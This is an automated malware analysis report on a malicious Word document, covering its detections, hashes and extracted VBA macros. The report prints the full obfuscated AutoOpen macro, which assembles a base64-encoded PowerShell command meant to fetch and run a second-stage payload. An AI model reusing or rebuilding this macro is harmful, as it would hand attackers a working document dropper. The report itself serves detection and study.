Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0379902c61a0670d…

MALICIOUS

Office (OLE)

Size: 105.2 KB
Created: 2018-06-11 21:08:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 8506e802d0aa1ffbf7f431a54052f643
SHA-1: 3581b13699956972944bfa7cbe88e2b3bd564e44
SHA-256: 0379902c61a0670d934e92f42935282db45b0c54a56b815d23a533febb14beb0
Risk Score: 210

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a Shell command, which is obfuscated but appears to be constructing a PowerShell command. This command is likely used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0'.

Heuristics (7)

  • ClamAV: Doc.Downloader.Valyria-6595163-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Matched lines in script:
      ULkCq = PiIKPD
      AaRBNziW = XwvKHhpOVzE + Shell(GsuJP + Chr(hIhXXfDhvk + vbKeyP + XjGuSR) + "owers" + hBAQsRm + wjPvqYE + dwoOaCwcU + WatdmvYH, 8056 - 8056)
      iCEWtX = CLng(53277 * CSng(kinzi + ChrB(lOSmwG + CInt(22784))))
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    Matched lines in script:
      End Function
      Sub Autoopen()
      On Error Resume Next
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10081 bytes
SHA-256: 0dabfea2b1c1c9e1229e203fc7fd7df22807ff9a3f5f6b49fd65c0b70d021512

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "wrHTzIzaLvcjJq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AaRBNziW()
On Error Resume Next
jiZkqt = CLng(16140 * CSng(trzHqU + ChrB(mfdKf + CInt(2920))))
cBsjJm = Int(fQivlv)
lJrrp = iXZpMF
IpLzYq = CYsKkW
OaRME = KBVlS
BGEbCT = vWpFj
uzHNR = CLng(62986 * CSng(SzQzI + ChrB(HjjHTZ + CInt(62297))))
pszwpr = Int(afYUhp)
bCoEF = XEpHS
MXPPV = CnFFJQ
pasRrc = nzEdSP
ULkCq = PiIKPD
AaRBNziW = XwvKHhpOVzE + Shell(GsuJP + Chr(hIhXXfDhvk + vbKeyP + XjGuSR) + "owers" + hBAQsRm + wjPvqYE + dwoOaCwcU + WatdmvYH, 8056 - 8056)
iCEWtX = CLng(53277 * CSng(kinzi + ChrB(lOSmwG + CInt(22784))))
cVCTnM = Int(SiBoo)
lsikvn = kjzEL
iQpXTz = wZjTZk
ESwlJ = vAWkCB
GwvYw = BiucK
End Function
Sub Autoopen()
On Error Resume Next
rLzLIO = CLng(19881 * CSng(YARkL + ChrB(VpduFV + CInt(34602))))
VwiLVS = Int(jKqlDS)
woNVrp = GjKMDl
EAWoQ = qAjzt
crqawH = rsojjd
kOSUwS = WcJTzn
AaRBNziW
owIPc = CLng(633 * CSng(CQFLF + ChrB(tTPTnL + CInt(77243))))
biMwbK = Int(PjGBT)
DwjRH = OiwMIt
nDMqjl = dNOvQA
HmkwJl = qXjCf
ZtcVDF = WCCqaP
End Sub


Attribute VB_Name = "uphkAGnGvN"
Function hBAQsRm()
On Error Resume Next
EzIkEo = CLng(70640 * CSng(YWBIE + ChrB(wJFViB + CInt(12455))))
JtMCqE = Int(HJrKu)
nFdYIu = cmTKJC
rovVOc = qPXBw
CRNJwK = JEbza
LHWZC = ocfSNW
bsNLWBOh = "HeLL " + "-e IABJAG4AVgB" + "vAGsAZQAt" + "AGUAeA" + "BwAH" + "IAZ"
RUwpGW = CLng(19491 * CSng(sKZKM + ChrB(ARmNwu + CInt(15236))))
NTpVJ = Int(EWzzn)
shMOV = QsTzzP
tnKtFP = oBHdAk
AKVKZ = KGSEX
XiPwQV = jQWtd
QvbmihZz = "QBzAFM" + "AaQBvAG4AIAAo" + "AE4ARQB3AC" + "0Ab" + "wBCAGoAZ" + "QBjAFQAIA" + "Bz" + "AFkAUwBUAEUAbQ"
kMNraj = CLng(27775 * CSng(NQiwmY + ChrB(imVFVN + CInt(84293))))
YEqHaE = Int(dQsQpK)
PsVJGK = hwdzh
dBnHj = Ppmjbo
QmRFVi = hXckMG
irGMKt = Tcdlk
WWHTjc = "AuAEkAbwAu" + "AHMAdABy" + "AGUAQQBtAH" + "IAZQBB" + "AEQAZQ" + "ByACgAI" + "AAoACAATgB" + "FAHcALQBvAEIAag"
vHcItV = CLng(51776 * CSng(cQsIOw + ChrB(FYCua + CInt(21098))))
wjWRud = Int(JnUllm)
vUrrfm = bNEvu
OEbqJm = Jvlba
wScYXd = uKELC
YaWTSW = uiFMd
EDuCYiLYm = "BlAGMAVAA" + "gAGkAbwA" + "uAGMAbwBN" + "AHA"
zYQziP = CLng(33742 * CSng(onwohS + ChrB(oDAPoP + CInt(26843))))
mcTFZD = Int(NQuvd)
dLVvlM = nYilDR
iFwpM = kdWPKr
Xaiulo = LsiTDC
AOziBI = lHTFjs
QJlFpGjFQ = "AcgBlAFMAU" + "wBJ" + "AG8AbgAuAGQA" + "ZQBGAEwAY" + "QB0" + "AGUAcwBU" + "AHI" + "AZQB"
zoGlt = CLng(65384 * CSng(NpkzO + ChrB(umadm + CInt(17387))))
kOZjI = Int(jmSPoC)
sLDXiJ = RnZNj
mDwjqT = kRlPZc
BauZv = SdjjCu
opzpLz = zdnlZ
SWqECRmaP = "BAE0AKAAg" + "AFsASQBvAC4AbQB" + "lAG0AT" + "wBSAHkAUwBUAH" + "IARQBB" + "AG0AXQAgAFsA"
cLaao = CLng(96333 * CSng(zTrsz + ChrB(mUIUP + CInt(57578))))
qmuUvD = Int(GNYmIA)
UGDJvE = dUwFqu
BoJXH = fpQGik
wlvEj = rRNELU
FMRwP = IRFYP
AYNzVB = "YwBPAG4AVgBlAFI" + "AdA" + "BdA" + "Do" + "AOgBmAFIAT" + "wB"
AWuiq = CLng(94509 * CSng(KirrYt + ChrB(rDtok + CInt(95942))))
iYSXU = Int(ZbEsNj)
jcwmXH = KqNUtC
NFXQoR = SzbHW
Eiiwi = EmOHGR
QssLwi = wMWhc
dGNWOtVXM = "tAGIAY" + "QBzAG" + "UANg" + "A0AFMAVA" + "ByAEkAbgBHACgA"
PcQfU = CLng(60901 * CSng(BcbLO + ChrB(AwIwwR + CInt(98736))))
AUZld = Int(FJrMzW)
cbVjn = QboRjw
dSoNX = cNPIr
qDvskO = skYXn
LqikL = spVzm
OkCrHV = "JwBWAFoAQgBo" + "AFQAOAB" + "JAHcARQBJ" + "AGIALwBTAG" + "oAOAB" + "zAEcAVQ"
hBAQsRm = bsNLWBOh + QvbmihZz + WWHTjc + EDuCYiLYm + QJlFpGjFQ + SWqECRmaP + AYNzVB + dGNWOtVXM + OkCrHV
End Function
Function wjPvqYE()
On Error Resume Next
dohtr = CLng(26301 * CSng(dqwXV + ChrB(DCREXF + CInt(90734))))
wMZud = Int(FwEVD)
XGZhw = KDJYOS
BIAbk = trSfbH
NKOimb = MLwcj
dvrsa = GjcuEX
PErwoQdio = "BS" + "AHAATgBXAEMA" + "SQB" + "MAGkAWQBL" + "AG8A" + "aA" + "Bn" + "AE" + "QA" + "QQBrAE8A"
XKQEb = CLng(95618 * CSng(wjApim + ChrB(wBpLYr + CInt(59771))))
wAaEd = Int(TlPJH)
EJvGU = JHzvBN
LIfmjj = oCLQdX
Zfvkf = TjpFi
shYXDw = RSsnw
DDfzm = "UgB4AE0AUgAwAD" + "MAYwBFA" + "EsAWABUAHUA" + "NwAy" + "ADQAWQBTAC8Ac" + "gB" + "zADEAQQBv"
dbiBzf = CLng(55971 * CSng(KkbCKW + ChrB(TcSZEs + CInt(75697))))
QfIRQF = Int(jrwEC)
ohraFs = zwVtcW
qZOunq = OWpNMs
DjFFT = fubzwz
ATKPp = ILHdCR
OfsAAO = "AGwAZgB" + "MAHIAbAA" + "3AG4AOAB0ADcAO" + "QAzAHEAZ" + "gA1AGQAdAB0AD" + "EAaQBYAFg" + "AUgBFAFAAVgBN" + "AE4ARQ" + "BLAEIAQgBMAEwAZ"
TZLCN = CLng(86824 * CSng(YuMPn + ChrB(cSvwP + CInt(91351))))
kbvLaY = Int(jzvGC)
IbFiZm = zjGGu
jRqPJO = dbriz
paQawG = zABMM
dpoEV = RwrAti
KcbndBjWSvm = "ABXAHo" + "AUwB3AEoAc" + "wAvAEYA" + "Tg" + "BQAHkAdgB"
svKjja = CLng(68067 * CSng(ziiFHA + ChrB(cjQdCk + CInt(70895))))
pWVpi = Int(zZXsLO)
oTRmd = jLFwNp
VLkQjC = iUKOl
TzFLN = mRoMzr
IEFkY = AwImp
whjMsKYRc = "4AFIAKwA1" + "AFEAZ" + "wBwAEgAUQB" + "MAFMA" + "Rw"
MJGlU = CLng(18015 * CSng(AcIjG + ChrB(lRDShw + CInt(72375))))
HtCYk = Int(FlCLMP)
AmffT = vqwAX
pmqzja = DhFQDN
XzOZwT = qkfXnN
piKsiZ = zPoWkZ
kLrvaFH = "BVAFI" + "AZABK" + "AFUARgBqADQAS" + "wA" + "xA" + "Eg" + "AMwA0AHQAM" + "AA1AGsAZw"
wjPvqYE = PErwoQdio + DDfzm + OfsAAO + KcbndBjWSvm + whjMsKYRc + kLrvaFH
End Function
Function dwoOaCwcU()
On Error Resume Next
WvVcS = CLng(69801 * CSng(wcWDEJ + ChrB(BLZtMr + CInt(26514))))
uXYnoX = Int(aDMudU)
JvVdPq = ooaPw
DOdXhw = AzDiv
QCSrJ = iMBiXj
WtGizY = ZiLaoN
zwSUBSMZsz = "AvAFEAY" + "wB5AHUARwBGAH" + "UAcgBJAGs" + "AOQBC" + "AGc" + "AcQBVAHgAcw" + "BFAHYAWgA3ADAA"
zoLsrh = CLng(13811 * CSng(EVzRjS + ChrB(BkFoFb + CInt(57196))))
PFFEim = Int(rDwAjY)
ljBVwp = ljoYoc
VzHDTt = mldYoN
uUimML = YmkfoJ
YRfuJQ = DozMi
QXfWVh = "OQA" + "2AF" + "MAWgB2A" + "GQANwBGAFgASQBo" + "AFQA" + "RQBJA" + "E4AcQ" + "BlAD" + "IAWQB"
zvYwIb = CLng(15158 * CSng(MFmcRb + ChrB(NXXfkS + CInt(26769))))
zifwH = Int(fkZiRz)
NnWMBm = LsSrp
qRZht = lbbSdf
AjVNu = bUzkAS
jBIFMn = iAOKr
zsRmp = "GAFAAZABlAFk" + "AawA2AGw" + "AMABlAHgAc" + "QBpAG8AcQBMAEUA"
rOAmUt = CLng(65199 * CSng(lfqiY + ChrB(NEqjZP + CInt(18527))))
jTWGpX = Int(ASKWF)
NUNPH = jvVSao
tiJhlb = zihQOD
hkNfI = iAkdR
fawOB = Sudork
jMffnOYbYnu = "QQBzAEwARgA4AGc" + "AMQBZA" + "EEAc" + "wAz" + "AEUAeQBlAG8AdQA"
uaLjm = CLng(94539 * CSng(DZBLI + ChrB(RVMttf + CInt(31009))))
wEwQj = Int(wJjtt)
HOrXRz = QOFYnF
iwhku = UEwVM
GdEtt = SffCd
cwzzFq = LKRozc
wBSlYzzXqoA = "2AFIASwBFADM" + "ATQBLADQAagBv" + "AEsAb" + "QBPAHQAMQA" + "zAGwAbgB"
whICQW = CLng(20143 * CSng(qDLUMQ + ChrB(ajcTr + CInt(14320))))
MUwHpB = Int(poFRz)
kXcmH = iGwnli
qkhMj = oBVnEI
JpAOGD = GkDHp
McrPh = cZKYH
CPczdwPj = "GAHAAYgB4AGgA" + "VABxAHE" + "AQwBB" + "AHEARQBTAFIAZgB" + "HAGMAcQ" + "BXAG8AVg" + "BxAHgAcA" + "Bi" + "AFQAbQBm" + "AGgAYQBiADU"
ZjIIPj = CLng(45960 * CSng(aVoFhh + ChrB(PJGjaX + CInt(39418))))
LJFGq = Int(HzRtmh)
GwVTj = lromh
fMPDrh = EIwwJ
jzTWXM = ALJLlM
LjjXXY = LTrvZ
IHvztLdSC = "AeQ" + "BIAHcAY" + "QBaAGsAc" + "ABpAHoAYgAvAHg" + "ANgA0AEcAMw" + "Aw" + "AHMAWABRAGMAb" + "gBlADEAOQB4AGUA"
icNKz = CLng(22848 * CSng(CORUQZ + ChrB(zUDESf + CInt(82952))))
VcYblW = Int(dbawA)
XzwMZ = nwRLH
lHrPmd = UoHllX
ThkptS = ZbWEs
IDwDRQ = zPiOoz
EpwwMVq = "QwA" + "4ADkAcABn" + "ADcAZg" + "B5AFUAbgBM" + "AGYAUAB" + "tAHEAMAB6A" + "FIANAB5AGY" + "Ae" + "QAvAFgAdAA0" + "AEoAYwBB"
jYQMM = CLng(77845 * CSng(CGMcRp + ChrB(MfULu + CInt(69305))))
RsDUVt = Int(EDWAwO)
AKKrDu = wjbzb
mjJDu = SPfMs
uWzDqb = bfMVJ
qpfUI = UtnpVt
wYIKzho = "AFgAVg" + "A2ADUAe" + "AB6AE4AeQBRAHY" + "AeAAzADMAO" + "QBYAEQAdA" + "B1AHMAcABi" + "AE0AQQBQAG" + "4AQwBGAHc"
GivdU = CLng(95779 * CSng(AJXIt + ChrB(zizaZN + CInt(99572))))
EYnuXk = Int(zHhcJ)
VnfBr = rThSW
PcquMP = tjCJI
zNuCBq = jWiqUZ
qIQWGQ = IHhDu
pHPqCZw = "AawBkAFMAOABmAG" + "oAZwB" + "lAEQAWQBuAFUA" + "WgBCADkATAB" + "mAFkAdgAyAGEA" + "LwBzAFgASgB" + "yADAAegBsAFYAYQ" + "BHAHgALwBkAFMAd"
dwoOaCwcU = zwSUBSMZsz + QXfWVh + zsRmp + jMffnOYbYnu + wBSlYzzXqoA + CPczdwPj + IHvztLdSC + EpwwMVq + wYIKzho + pHPqCZw
End Function
Function WatdmvYH()
On Error Resume Next
UQnTd = CLng(44256 * CSng(tJwRf + ChrB(psswzZ + CInt(75082))))
RlSfDs = Int(pGNwG)
LTjLN = HojMzq
abQJid = jDiUn
iCEDi = ZCiZI
lcfskY = oZRoZ
qwkqIX = "wBSADYAbABVAH" + "gATwBpAGw" + "AWABwAFoAcQA1A" + "CsAUwB" + "2AFcAVQ" + "A5AEMASgBGAGIA" + "YgBJAHkAcwBFAF" + "oARABuAGgAMwB" + "FAFE" + "ATw"
iUwpIo = CLng(28585 * CSng(nSFkc + ChrB(jRbwCH + CInt(44394))))
BcrTGB = Int(ANNiHE)
aNVktO = KaIHvm
zVmSZ = TWzphN
mFrFV = irOaR
IwqBi = KPcDs
wiVjvi = "BZA" + "DkAM" + "QBzAEIATQBjAFIA" + "YgBLAHQAcg" + "BFAFIA" + "bwBKAEM" + "AWgBIADQAbgAz" + "AF" + "EAMwBrAFoAQ"
MiWfDP = CLng(62783 * CSng(jqLFi + ChrB(mVDfj + CInt(89481))))
EQjcU = Int(iWzvj)
QsnCC = wtOhSn
TfYpLz = zFIRn
iACji = bsSKzT
rlAHW = vqBkFh
wmZNIT = "QBo" + "AHQASgBvAE8A" + "bgBBAGIA" + "ZgBBAG4AQgBiAH" + "YAYwBEACcAKQA" + "gACwAI" + "ABb" + "AE" + "kAbwAuAGM" + "Abw"
wPPKkW = CLng(29641 * CSng(FwrhwX + ChrB(sAUYV + CInt(20747))))
izwlS = Int(MjPwww)
MdHadD = lnJZY
kwAQhL = shSLwD
nYiuj = bzPsu
SJUvnZ = rHOfz
NmpDqiGdsX = "BNAFAAc" + "gBlAHMAUwBJA" + "E8AbgAuAEMA" + "bwBNAHAAUgB" + "FAHMAcwB" + "JAE8ATgBtAG8" + "ARA"
mVDfK = CLng(92679 * CSng(ZjNNEO + ChrB(VwkiIV + CInt(73113))))
RXliml = Int(QZsji)
jYUFwS = mvHqY
rsWfXd = sDjtjJ
NPoUVk = paQdLC
HVQuF = tTttU
lMPawYzqR = "BFAF" + "0AOgA6A" + "GQ" + "AZQBDAG" + "8ATQBwAF" + "IAZ" + "QBTAFMAI"
AEdra = CLng(47876 * CSng(cHWHmV + ChrB(pCRFCL + CInt(51706))))
liQwa = Int(ztVuz)
koMjp = YaJlO
ZRNrCn = IinTvb
wjfNAM = FEBqiQ
nADzUm = JsGri
BPkdoRS = "AApACAA" + "KQAgACwAW" + "wB0AEUA" + "WABUAC4AZQ" + "BuAGMA" + "bwBkAGkATgBnAF" + "0AOgA6AG"
rlwVR = CLng(13886 * CSng(Gsvvk + ChrB(qTMMA + CInt(38247))))
sVijT = Int(pConZW)
IvTHf = bCsuE
OSvFw = FXKLVH
CpRLR = WZSsv
EhbsV = aZcEI
zYsnqaSl = "EAUwBjAEkASQAp" + "ACAAKQAuAFIA" + "ZQBBAEQAdABvAGU" + "ATgBEACgAIAAp" + "AA=="
WatdmvYH = qwkqIX + wiVjvi + wmZNIT + NmpDqiGdsX + lMPawYzqR + BPkdoRS + zYsnqaSl
End Function